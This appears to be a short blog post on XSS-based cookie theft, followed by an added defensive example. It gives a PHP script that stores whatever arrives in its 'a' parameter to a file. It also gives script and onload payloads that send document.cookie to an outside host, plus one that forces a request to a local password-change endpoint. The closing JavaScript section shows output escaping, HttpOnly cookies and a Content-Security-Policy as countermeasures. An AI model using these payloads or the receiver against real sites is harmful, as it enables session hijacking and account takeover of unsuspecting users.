XSS Phishing

Server-side code that receives the data

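    <?php
    // Check that the "a" query parameter was supplied before reading it
    if(isset($_GET['a']))
    {
    	// Write the received value to tmp/cookie.txt (overwrites the previous value)
    	$content = $_GET['a'];
    	file_put_contents('tmp/cookie.txt',$content);
    }else{
    	echo 'no data input';
    }
    ?>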

Constructing the phishing code

    <script>document.location.href='http://lone.535yx.cn/xs/getcookie.php?a='+document.cookie</script>

    <body onload = "document.location.href='http://lone.535yx.cn/xs/getcookie.php?a='+document.cookie"></body>

    <script>window.location.href='http://127.0.0.1/api/change.php?p=123';</script>
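
The defensive counterpart to the payloads above, as an added example that is not part of the original post: output encoding makes the injected markup inert, `HttpOnly` keeps the session cookie out of `document.cookie`, and a Content-Security-Policy blocks inline script as a second layer. The helper names, the `sid` cookie and the `collector.example` host are assumptions made for this sketch.

```javascript
// Added example: hypothetical helper names; runs under Node.js with no dependencies.

// Encode the five HTML-significant characters so input is rendered as text, not markup.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Session cookie that page script cannot read: HttpOnly hides it from document.cookie.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Second layer: scripts may load only from the site's own origin, so inline <script>
// blocks and inline handlers such as onload="..." do not run even if one slips through.
const CSP_HEADER = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

// Render untrusted input (for example a comment or a reflected query value).
function renderUntrusted(input) {
  return {
    headers: {
      'Content-Security-Policy': CSP_HEADER,
      'Set-Cookie': sessionCookieHeader('sid', 'constructed-session-id'),
    },
    body: `<p>${escapeHtml(input)}</p>`,
  };
}

// Constructed inputs with the same shape as the three payloads on this page;
// collector.example is a placeholder host.
const SAMPLE_INPUTS = [
  "<script>document.location.href='http://collector.example/c.php?a='+document.cookie</script>",
  "<body onload = \"document.location.href='http://collector.example/c.php?a='+document.cookie\"></body>",
  "<script>window.location.href='http://127.0.0.1/api/change.php?p=123';</script>",
];

// True when nothing inside the wrapping <p>...</p> can open a tag or an attribute.
function isInert(body) {
  const inner = body.slice(3, body.length - 4);
  return !/[<>"']/.test(inner);
}

for (const input of SAMPLE_INPUTS) {
  const res = renderUntrusted(input);
  console.log(isInert(res.body), res.body);
}
```

In PHP, the language of the receiver script above, the same controls are `htmlspecialchars($value, ENT_QUOTES, 'UTF-8')` on output and the `httponly` option of `setcookie()`.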

posted @ LinkPoc